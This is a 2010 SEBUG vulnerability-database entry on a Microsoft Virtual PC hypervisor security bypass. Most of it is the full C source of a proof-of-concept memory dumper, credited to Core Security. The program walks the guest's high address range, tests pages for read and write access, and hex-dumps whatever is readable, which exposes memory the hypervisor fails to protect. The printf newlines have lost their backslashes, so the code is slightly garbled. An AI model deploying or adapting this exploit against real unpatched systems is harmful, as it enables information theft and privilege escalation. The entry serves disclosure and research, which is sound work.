19280: Microsoft Virtual PC Hypervisor Virtual Machine Monitor Security Bypass Vulnerability

Microsoft Virtual PC Hypervisor Virtual Machine Monitor Security Bypass Vulnerability

SEBUG-ID:19280

Published:2010-03-17

Vulnerable:

Microsoft Windows Virtual PC 0
Microsoft Windows 7 XP Mode 0
Microsoft Virtual Server 2005 0
Microsoft Virtual PC 2007 SP1
Microsoft Virtual PC 2007 0

Discription:

Bugtraq ID:38764 

Microsoft Virtual PC Hypervisor is prone to a security-bypass vulnerability.

Attackers can exploit this issue to bypass memory protection mechanisms. Successfully exploiting this issue will allow attackers to gain access to sensitive information, overwrite arbitrary data, and gain elevated privileges on the affected computer.

The following products are affected:

Virtual PC 2007
Virtual PC 2007 SP1
Windows Virtual PC
Virtual Server 2005
Windows 7 XP Mode

Exploit:

[www.sebug.net]
The following procedures (methods) may contain something offensive，they are only for security researches and teaching , at your own risk!

#include <windows.h>
#include <stdio.h>
#include <ctype.h>
     
#define ROWS 16

void find_leaked_memory ( void );
void print_data ( unsigned int , char * , unsigned int );

int main ( void )
{
   /* message for users */
    printf ( "n*********** vpdumper.exe ***********" );
    printf ( "nCreated by Nicolas A. Economou ( neconomou@corest.com )" );
    printf ( "nCore Security Technologies, Buenos Aires, Argentina ( 2010 )n" );

    /* Search and Print leaked memory */
    printf ( "nsearching leaked memoryn" );
    find_leaked_memory ();

    return ( 1 );
}

void find_leaked_memory ( void )
{
        char buffer [ 0x1000 ];
        char *base;
        int r, w;

        /* search the high address memory area */
        for ( base = ( char * ) 0x80000000 ; base < ( char * ) 0xfffff000 ; base += 0x1000 )
        {
          /* Dark Area */
          if ( ( unsigned int ) base == 0xe839c000 )
          {
            continue;
          }

          /* Inicialize flags */
          r = FALSE;
          w = FALSE;

          /* check readable */
          if ( IsBadReadPtr ( base , 1 ) == FALSE )
          {
            /* set flag */
            r = TRUE;
          }
          /* check writeable */
          if ( IsBadWritePtr ( base , 1 ) == FALSE )
          {
            /* set flag */
            w = TRUE;
          }
          /* if readable or writeable */
          if ( r == TRUE || w == TRUE )
          {
            /* get contents into our buffer */
            memcpy ( buffer , base , 0x1000 );

            /* print page attributes */
            printf ( "attributes: " );
            printf ( "%s" , ( r == TRUE ) ? "R":"" );
            printf ( "%s" , ( w == TRUE ) ? "W":"" );
            printf ( "n" );

            /* print the memory */
            print_data ( ( unsigned int ) base , buffer , 0x1000 );
          }
        }
}

void print_data ( unsigned int direccion , char *buffer , unsigned int bytes_a_imprimir )
{
  unsigned int cont;
  unsigned int i;

/* Imprimo las lineas encontradas */
  for ( cont = 0 ; cont < bytes_a_imprimir ; cont = cont + ROWS )
  {
  /* Imprimo la direccion de la memoria */
    printf ( "%.8x | " , direccion );

  /* Incremento la direccion a mostrar */
    direccion = direccion + ROWS;
    
  /* Imprimo en hexa */
    for ( i = 0 ; i < ROWS ; i ++ )
    {
    /* Imprimo la cantidad que pedi */  
      if ( i < ( bytes_a_imprimir - cont ) )
      {
        printf ( "%.2x " , ( unsigned char ) buffer [ i + cont ] );
      }
      else
      {
        printf ( "   " );
      }
    }
  /* Espacio entre las 2 columnas */
    printf ( "| " );
  /* Imprimo en caracteres */  
    for ( i = 0 ; i < ROWS ; i ++ )
    {
      if ( i < ( bytes_a_imprimir - cont ) )
      {
        printf ( "%c" , ( isgraph ( buffer [ i + cont ] ) ) ? buffer [ i + cont ] : '.' );
      }
      else
      {
        printf ( " " );
      }
    }
  /* Fin de linea */
    printf ( "n" );
  }
}

SEBUG Solution:

Currently we are not aware of any vendor-supplied patches

// sebug.net [2010-03-17]